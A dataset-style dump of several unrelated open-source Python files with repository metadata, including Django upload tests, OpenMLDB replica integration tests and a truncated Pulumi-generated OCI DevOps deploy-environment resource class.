calm/dsl/config/__init__.py
|
tonyjames/calm-dsl
|
e94a35e26a43a0081d6487a538675641fc1d3667
|
[
"Apache-2.0"
] | 1
|
2020-02-13T02:56:58.000Z
|
2020-02-13T02:56:58.000Z
|
from .config import (
get_config,
init_config,
print_config,
get_default_user_config_file,
set_config,
)
__all__ = [
"get_config",
"init_config",
"print_config",
"get_default_user_config_file",
"set_config",
]
| 14.823529
| 35
| 0.654762
| 30
| 252
| 4.833333
| 0.366667
| 0.124138
| 0.17931
| 0.262069
| 0.868966
| 0.868966
| 0.868966
| 0.868966
| 0.868966
| 0.868966
| 0
| 0
| 0.242063
| 252
| 16
| 36
| 15.75
| 0.759162
| 0
| 0
| 0
| 0
| 0
| 0.281746
| 0.111111
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0.142857
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
397e037edd923591e8d1bedd7452dad22ef8ff0f
| 2,472
|
py
|
Python
|
system/test.py
|
PDF2CASH/PDF2CASH_CloudUpdater
|
94b59831b9c34dbd97c84a607f17a1958588deab
|
[
"MIT"
] | 1
|
2018-10-17T14:21:42.000Z
|
2018-10-17T14:21:42.000Z
|
system/test.py
|
PDF2CASH/PDF2CASH_CloudUpdater
|
94b59831b9c34dbd97c84a607f17a1958588deab
|
[
"MIT"
] | null | null | null |
system/test.py
|
PDF2CASH/PDF2CASH_CloudUpdater
|
94b59831b9c34dbd97c84a607f17a1958588deab
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
import json
class SystemTest(TestCase):
def test_post_1(self):
url = '/api/system/pdftoinvoice/'
file = open("system/test.zip", 'rb')
response = self.client.post(url, {'file': file}, format='multipart')
self.assertEqual(response.status_code, 200)
def test_post_2(self):
url = '/api/system/bi/'
file = open("system/test.zip", 'rb')
response = self.client.post(url, {'file': file}, format='multipart')
self.assertEqual(response.status_code, 200)
def test_post_3(self):
url = '/api/system/frontend/'
file = open("system/test.zip", 'rb')
response = self.client.post(url, {'file': file}, format='multipart')
self.assertEqual(response.status_code, 200)
def test_post_4(self):
url = '/api/system/management/'
file = open("system/test.zip", 'rb')
response = self.client.post(url, {'file': file}, format='multipart')
self.assertEqual(response.status_code, 200)
def test_version(self):
url = '/api/system/management/'
file = open("system/test.zip", 'rb')
response = self.client.post(url, {'file': file}, format='multipart')
self.assertEqual(json.loads(response.content)[1]['version'], 1)
url = '/api/system/frontend/'
file = open("system/test.zip", 'rb')
response = self.client.post(url, {'file': file}, format='multipart')
self.assertEqual(json.loads(response.content)[1]['version'], 2)
def test_get_4(self):
url = '/api/system/pdftoinvoice/'
file = open("system/test.zip", 'rb')
response = self.client.post(url, {'file': file}, format='multipart')
url = '/api/system/bi/'
file = open("system/test.zip", 'rb')
response = self.client.post(url, {'file': file}, format='multipart')
url = '/api/system/frontend/'
file = open("system/test.zip", 'rb')
response = self.client.post(url, {'file': file}, format='multipart')
url = '/api/system/management/'
file = open("system/test.zip", 'rb')
response = self.client.post(url, {'file': file}, format='multipart')
url = '/api/system/zip/'
response = self.client.get(url)
self.assertNotEquals(response.content, b'')
url = '/api/system/version/'
response = self.client.get(url)
self.assertEquals(json.loads(response.content)['version'], 4)
| 41.2
| 76
| 0.602751
| 302
| 2,472
| 4.884106
| 0.135762
| 0.048814
| 0.097627
| 0.122034
| 0.865085
| 0.863729
| 0.825763
| 0.825763
| 0.825763
| 0.825763
| 0
| 0.01144
| 0.222087
| 2,472
| 59
| 77
| 41.898305
| 0.75559
| 0
| 0
| 0.705882
| 0
| 0
| 0.230178
| 0.073625
| 0
| 0
| 0
| 0
| 0.156863
| 1
| 0.117647
| false
| 0
| 0.039216
| 0
| 0.176471
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ffd0aa56c237765008ae556daed22a3979dad59b
| 174
|
py
|
Python
|
__init__.py
|
TheSecEng/MarkdownTOC
|
7c69137249820dc586fd90b58fca2f34c54f2abc
|
[
"MIT"
] | 299
|
2015-01-16T23:58:12.000Z
|
2022-03-12T03:26:17.000Z
|
__init__.py
|
naokazuterada/MarkdownTOC
|
b61546d001661d9385423556a62c21c36abc6857
|
[
"MIT"
] | 137
|
2015-01-14T22:43:21.000Z
|
2021-05-25T10:27:12.000Z
|
__init__.py
|
TheSecEng/MarkdownTOC
|
7c69137249820dc586fd90b58fca2f34c54f2abc
|
[
"MIT"
] | 77
|
2015-01-23T17:51:36.000Z
|
2022-03-16T02:19:38.000Z
|
from .markdowntoc.autorunner import AutoRunner
from .markdowntoc.markdowntoc_insert import MarkdowntocInsert
from .markdowntoc.markdowntoc_update import MarkdowntocUpdate
| 43.5
| 62
| 0.87931
| 17
| 174
| 8.882353
| 0.470588
| 0.298013
| 0.344371
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086207
| 174
| 3
| 63
| 58
| 0.949686
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
f29e73f99181e06dc8f978880b3e4b5f44424ccc
| 68
|
py
|
Python
|
Codeforces/G_Challenge_Pennants.py
|
anubhab-code/Competitive-Programming
|
de28cb7d44044b9e7d8bdb475da61e37c018ac35
|
[
"MIT"
] | null | null | null |
Codeforces/G_Challenge_Pennants.py
|
anubhab-code/Competitive-Programming
|
de28cb7d44044b9e7d8bdb475da61e37c018ac35
|
[
"MIT"
] | null | null | null |
Codeforces/G_Challenge_Pennants.py
|
anubhab-code/Competitive-Programming
|
de28cb7d44044b9e7d8bdb475da61e37c018ac35
|
[
"MIT"
] | null | null | null |
n=int(input())
print((n*(n+1)*(n+2)*(n+3)*(n+4)*n*(n+1)*(n+2))//720)
| 34
| 53
| 0.455882
| 19
| 68
| 1.631579
| 0.473684
| 0.129032
| 0.193548
| 0.258065
| 0.322581
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134328
| 0.014706
| 68
| 2
| 53
| 34
| 0.328358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
f2b6a4cdfe5711eefdb890f0cf1dcc416da4dbf3
| 10,600
|
py
|
Python
|
test-common/integrationtest/testcase/test_addreplica.py
|
lotabout/OpenMLDB
|
432da3afbed240eb0b8d0571c05f233b1a5a1cd4
|
[
"Apache-2.0"
] | 2,659
|
2021-06-07T12:59:15.000Z
|
2022-03-30T15:29:37.000Z
|
test-common/integrationtest/testcase/test_addreplica.py
|
wei20024/OpenMLDB
|
16b426bcba18f70e083179f82db51e71e65d1bf6
|
[
"Apache-2.0"
] | 1,396
|
2021-05-28T09:50:13.000Z
|
2022-03-31T16:37:49.000Z
|
test-common/integrationtest/testcase/test_addreplica.py
|
wei20024/OpenMLDB
|
16b426bcba18f70e083179f82db51e71e65d1bf6
|
[
"Apache-2.0"
] | 499
|
2021-05-31T07:36:48.000Z
|
2022-03-31T15:10:12.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2021 4Paradigm
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -*- coding: utf-8 -*-
from testcasebase import TestCaseBase
import time
from libs.test_loader import load
from libs.deco import multi_dimension
import libs.ddt as ddt
@ddt.ddt
class TestAddReplica(TestCaseBase):
@multi_dimension(False)
def test_addreplica_leader_add(self):
"""
主节点addreplica slave成功
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
self.put(self.leader,
self.tid,
self.pid,
'k1',
self.now() - 1,
'v1')
rs2 = self.create(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs2)
rs3 = self.create(self.slave2, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs3)
rs4 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs4)
rs5 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave2)
self.assertIn('AddReplica ok', rs5)
table_status1 = self.get_table_status(self.slave1, self.tid, self.pid)
self.assertEqual(table_status1[:6], ['1', 'kTableFollower', 'kTableNormal', 'true', '144000min', '0s'])
table_status2 = self.get_table_status(self.slave2, self.tid, self.pid)
self.assertEqual(table_status2[:6], ['1', 'kTableFollower', 'kTableNormal', 'true', '144000min', '0s'])
self.put(self.leader,
self.tid,
self.pid,
'k2',
self.now() - 1,
'v2')
time.sleep(1)
self.assertIn('v1', self.scan(self.slave1, self.tid, self.pid, 'k1', self.now(), 1))
self.assertIn('v2', self.scan(self.slave1, self.tid, self.pid, 'k2', self.now(), 1))
self.assertIn('v1', self.scan(self.slave2, self.tid, self.pid, 'k1', self.now(), 1))
self.assertIn('v2', self.scan(self.slave2, self.tid, self.pid, 'k2', self.now(), 1))
@multi_dimension(True)
def test_addreplica_leader_add_md(self):
"""
主节点addreplica slave成功
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
rs = self.put(self.leader,
self.tid,
self.pid,
'',
self.now() - 1,
'v1','1.1','k1')
self.assertIn('Put ok', rs)
rs2 = self.create(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs2)
rs3 = self.create(self.slave2, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs3)
rs4 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs4)
rs5 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave2)
self.assertIn('AddReplica ok', rs5)
table_status1 = self.get_table_status(self.slave1, self.tid, self.pid)
self.assertEqual(table_status1[:6], ['1', 'kTableFollower', 'kTableNormal', 'true', '144000min', '0s'])
table_status2 = self.get_table_status(self.slave2, self.tid, self.pid)
self.assertEqual(table_status2[:6], ['1', 'kTableFollower', 'kTableNormal', 'true', '144000min', '0s'])
self.put(self.leader,
self.tid,
self.pid,
'',
self.now() - 1,
'v2', '1.1','k2')
time.sleep(1)
self.assertIn('v1', self.scan(self.slave1, self.tid, self.pid, {'card':'k1'}, self.now(), 1))
self.assertIn('v2', self.scan(self.slave1, self.tid, self.pid, {'card':'k2'}, self.now(), 1))
self.assertIn('v1', self.scan(self.slave2, self.tid, self.pid, {'card':'k1'}, self.now(), 1))
self.assertIn('v2', self.scan(self.slave2, self.tid, self.pid, {'card':'k2'}, self.now(), 1))
def test_addreplica_change_to_normal(self):
"""
主节点addreplica之后,状态变回normal
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
rs2 = self.create(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs2)
rs3 = self.pausesnapshot(self.slave1, self.tid, self.pid)
self.assertIn('PauseSnapshot ok', rs3)
rs4 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs4)
table_status = self.get_table_status(self.leader, self.tid, self.pid)
self.assertEqual(table_status[:6], ['0', 'kTableLeader', 'kTableNormal', 'true', '144000min', '0s'])
def test_addreplica_slave_cannot_add(self):
"""
从节点不允许addreplica
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs1)
rs2 = self.create(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
self.assertIn('Create table ok', rs2)
rs3 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('Fail to Add Replica', rs3)
@multi_dimension(False)
def test_delreplica_slave_cannot_scan(self):
"""
主节点删除replica后put数据,slave scan不出来
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid, 144000, 2, 'true')
self.assertIn('Create table ok', rs1)
self.create(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
self.create(self.slave2, 't', self.tid, self.pid, 144000, 8, 'false')
rs = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs)
rs = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave2)
self.assertIn('AddReplica ok', rs)
self.put(self.leader,
self.tid,
self.pid,
'k1',
self.now() - 1,
'v1')
time.sleep(1)
rs2 = self.delreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('DelReplica ok', rs2)
self.put(self.leader,
self.tid,
self.pid,
'k2',
self.now() - 1,
'v2')
time.sleep(1)
self.assertIn('v1', self.scan(self.slave1, self.tid, self.pid, 'k1', self.now(), 1))
self.assertFalse('v2' in self.scan(self.slave1, self.tid, self.pid, 'k2', self.now(), 1))
self.assertIn('v1', self.scan(self.slave2, self.tid, self.pid, 'k1', self.now(), 1))
self.assertIn('v2', self.scan(self.slave2, self.tid, self.pid, 'k2', self.now(), 1))
@multi_dimension(True)
def test_delreplica_slave_cannot_scan_md(self):
"""
主节点删除replica后put数据,slave scan不出来
:return:
"""
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
self.create(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
self.create(self.slave2, 't', self.tid, self.pid, 144000, 8, 'false')
rs2 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs2)
rs2 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave2)
self.assertIn('AddReplica ok', rs2)
self.put(self.leader,
self.tid,
self.pid,
'',
self.now() - 1,
'v1', '1.1', 'k1')
time.sleep(1)
self.assertIn('v1', self.scan(self.slave2, self.tid, self.pid, {'card':'k1'}, self.now(), 1))
rs3 = self.delreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('DelReplica ok', rs3)
self.put(self.leader,
self.tid,
self.pid,
'',
self.now() - 1,
'v2', '1.1', 'k2')
time.sleep(1)
self.assertFalse('v1' not in self.scan(self.slave1, self.tid, self.pid, {'card':'k1'}, self.now(), 1))
self.assertFalse('v2' in self.scan(self.slave1, self.tid, self.pid, {'card':'k2'}, self.now(), 1))
self.assertFalse('v1' not in self.scan(self.slave2, self.tid, self.pid, {'card':'k1'}, self.now(), 1))
self.assertFalse('v2' not in self.scan(self.slave2, self.tid, self.pid, {'card':'k2'}, self.now(), 1))
@multi_dimension(True)
@ddt.data(
({'k2': ('string:index', 'testvalue1'),
'k3': ('double', 1.1)}),
({'k0': ('string:index', 1.1),
'k2': ('string:index', 'testvalue1'),
'k3': ('double', 1.1)}),
({'k1': ('double:index', 1.1),
'k2': ('string:index', 'testvalue1'),
'k3': ('double', 1.1)}),
({'k1': ('string', 1.1),
'k2': ('string:index', 'testvalue1'),
'k3': ('double', 1.1)}),
)
def test_addreplica_fail_schema_mismatch(self, slave_schema): # RTIDB-166
"""
添加高维副本表时,副本schema主表不匹配,添加失败
:return:
"""
self.multidimension_vk = {'k1': ('string:index', 'testvalue0'),
'k2': ('string:index', 'testvalue1'),
'k3': ('double', 1.1)}
rs1 = self.create(self.leader, 't', self.tid, self.pid)
self.assertIn('Create table ok', rs1)
self.multidimension_vk = slave_schema
self.create(self.slave1, 't', self.tid, self.pid, 144000, 8, 'false')
rs2 = self.addreplica(self.leader, self.tid, self.pid, 'client', self.slave1)
self.assertIn('AddReplica ok', rs2)
if __name__ == "__main__":
load(TestAddReplica)
| 43.621399
| 111
| 0.566321
| 1,343
| 10,600
| 4.419955
| 0.123604
| 0.073113
| 0.114892
| 0.146226
| 0.813342
| 0.795991
| 0.78504
| 0.769879
| 0.75876
| 0.751685
| 0
| 0.048843
| 0.266038
| 10,600
| 242
| 112
| 43.801653
| 0.714139
| 0.081604
| 0
| 0.715084
| 0
| 0
| 0.119566
| 0
| 0
| 0
| 0
| 0
| 0.27933
| 1
| 0.039106
| false
| 0
| 0.027933
| 0
| 0.072626
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4b4c70b33a40e74947b1d3a02473b56961605b04
| 247
|
py
|
Python
|
metrilyx/schema/provider/interface.py
|
metrilyx/metrilyx-dataserver
|
12a1663a4845a5e216097e8bba59429d53341857
|
[
"Apache-2.0"
] | 1
|
2016-12-16T09:14:56.000Z
|
2016-12-16T09:14:56.000Z
|
metrilyx/schema/provider/interface.py
|
metrilyx/metrilyx-dataserver
|
12a1663a4845a5e216097e8bba59429d53341857
|
[
"Apache-2.0"
] | null | null | null |
metrilyx/schema/provider/interface.py
|
metrilyx/metrilyx-dataserver
|
12a1663a4845a5e216097e8bba59429d53341857
|
[
"Apache-2.0"
] | null | null | null |
class IProvider(object):
def normalizedAlias(self, metaStr, aliasStr):
raise NotImplementedError("Subclass must implement this method!")
def aggr(self):
raise NotImplementedError("Subclass must implement this method!")
| 24.7
| 73
| 0.720648
| 25
| 247
| 7.12
| 0.64
| 0.269663
| 0.359551
| 0.404494
| 0.617978
| 0.617978
| 0.617978
| 0
| 0
| 0
| 0
| 0
| 0.194332
| 247
| 9
| 74
| 27.444444
| 0.894472
| 0
| 0
| 0.4
| 0
| 0
| 0.293878
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
4b6445d706c9692e3f575e73372d0f26de797b1b
| 39,812
|
py
|
Python
|
sdk/python/pulumi_oci/devops/deploy_environment.py
|
EladGabay/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2021-08-17T11:14:46.000Z
|
2021-12-31T02:07:03.000Z
|
sdk/python/pulumi_oci/devops/deploy_environment.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-09-06T11:21:29.000Z
|
2021-09-06T11:21:29.000Z
|
sdk/python/pulumi_oci/devops/deploy_environment.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-08-24T23:31:30.000Z
|
2022-01-02T19:26:54.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['DeployEnvironmentArgs', 'DeployEnvironment']
@pulumi.input_type
class DeployEnvironmentArgs:
def __init__(__self__, *,
deploy_environment_type: pulumi.Input[str],
project_id: pulumi.Input[str],
cluster_id: Optional[pulumi.Input[str]] = None,
compute_instance_group_selectors: Optional[pulumi.Input['DeployEnvironmentComputeInstanceGroupSelectorsArgs']] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
function_id: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a DeployEnvironment resource.
:param pulumi.Input[str] deploy_environment_type: (Updatable) Deployment environment type.
:param pulumi.Input[str] project_id: The OCID of a project.
:param pulumi.Input[str] cluster_id: (Updatable) The OCID of the Kubernetes cluster.
:param pulumi.Input['DeployEnvironmentComputeInstanceGroupSelectorsArgs'] compute_instance_group_selectors: (Updatable) A collection of selectors. The combination of instances matching the selectors are included in the instance group.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] description: (Updatable) Optional description about the deployment environment.
:param pulumi.Input[str] display_name: (Updatable) Deployment environment display name. Avoid entering confidential information.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
:param pulumi.Input[str] function_id: (Updatable) The OCID of the Function.
"""
pulumi.set(__self__, "deploy_environment_type", deploy_environment_type)
pulumi.set(__self__, "project_id", project_id)
if cluster_id is not None:
pulumi.set(__self__, "cluster_id", cluster_id)
if compute_instance_group_selectors is not None:
pulumi.set(__self__, "compute_instance_group_selectors", compute_instance_group_selectors)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if function_id is not None:
pulumi.set(__self__, "function_id", function_id)
@property
@pulumi.getter(name="deployEnvironmentType")
def deploy_environment_type(self) -> pulumi.Input[str]:
"""
(Updatable) Deployment environment type.
"""
return pulumi.get(self, "deploy_environment_type")
@deploy_environment_type.setter
def deploy_environment_type(self, value: pulumi.Input[str]):
pulumi.set(self, "deploy_environment_type", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Input[str]:
"""
The OCID of a project.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: pulumi.Input[str]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of the Kubernetes cluster.
"""
return pulumi.get(self, "cluster_id")
@cluster_id.setter
def cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_id", value)
@property
@pulumi.getter(name="computeInstanceGroupSelectors")
def compute_instance_group_selectors(self) -> Optional[pulumi.Input['DeployEnvironmentComputeInstanceGroupSelectorsArgs']]:
"""
(Updatable) A collection of selectors. The combination of instances matching the selectors are included in the instance group.
"""
return pulumi.get(self, "compute_instance_group_selectors")
@compute_instance_group_selectors.setter
def compute_instance_group_selectors(self, value: Optional[pulumi.Input['DeployEnvironmentComputeInstanceGroupSelectorsArgs']]):
pulumi.set(self, "compute_instance_group_selectors", value)
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@defined_tags.setter
def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "defined_tags", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Optional description about the deployment environment.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) Deployment environment display name. Avoid entering confidential information.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
(Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@freeform_tags.setter
def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="functionId")
def function_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of the Function.
"""
return pulumi.get(self, "function_id")
@function_id.setter
def function_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "function_id", value)
@pulumi.input_type
class _DeployEnvironmentState:
def __init__(__self__, *,
cluster_id: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
compute_instance_group_selectors: Optional[pulumi.Input['DeployEnvironmentComputeInstanceGroupSelectorsArgs']] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deploy_environment_type: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
function_id: Optional[pulumi.Input[str]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
system_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering DeployEnvironment resources.
:param pulumi.Input[str] cluster_id: (Updatable) The OCID of the Kubernetes cluster.
:param pulumi.Input[str] compartment_id: The OCID of a compartment.
:param pulumi.Input['DeployEnvironmentComputeInstanceGroupSelectorsArgs'] compute_instance_group_selectors: (Updatable) A collection of selectors. The combination of instances matching the selectors are included in the instance group.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] deploy_environment_type: (Updatable) Deployment environment type.
:param pulumi.Input[str] description: (Updatable) Optional description about the deployment environment.
:param pulumi.Input[str] display_name: (Updatable) Deployment environment display name. Avoid entering confidential information.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
:param pulumi.Input[str] function_id: (Updatable) The OCID of the Function.
:param pulumi.Input[str] lifecycle_details: A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed state.
:param pulumi.Input[str] project_id: The OCID of a project.
:param pulumi.Input[str] state: The current state of the deployment environment.
:param pulumi.Input[Mapping[str, Any]] system_tags: Usage of system tag keys. These predefined keys are scoped to namespaces. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"orcl-cloud.free-tier-retained": "true"}`
:param pulumi.Input[str] time_created: Time the deployment environment was created. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
:param pulumi.Input[str] time_updated: Time the deployment environment was updated. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
"""
if cluster_id is not None:
pulumi.set(__self__, "cluster_id", cluster_id)
if compartment_id is not None:
pulumi.set(__self__, "compartment_id", compartment_id)
if compute_instance_group_selectors is not None:
pulumi.set(__self__, "compute_instance_group_selectors", compute_instance_group_selectors)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if deploy_environment_type is not None:
pulumi.set(__self__, "deploy_environment_type", deploy_environment_type)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if function_id is not None:
pulumi.set(__self__, "function_id", function_id)
if lifecycle_details is not None:
pulumi.set(__self__, "lifecycle_details", lifecycle_details)
if project_id is not None:
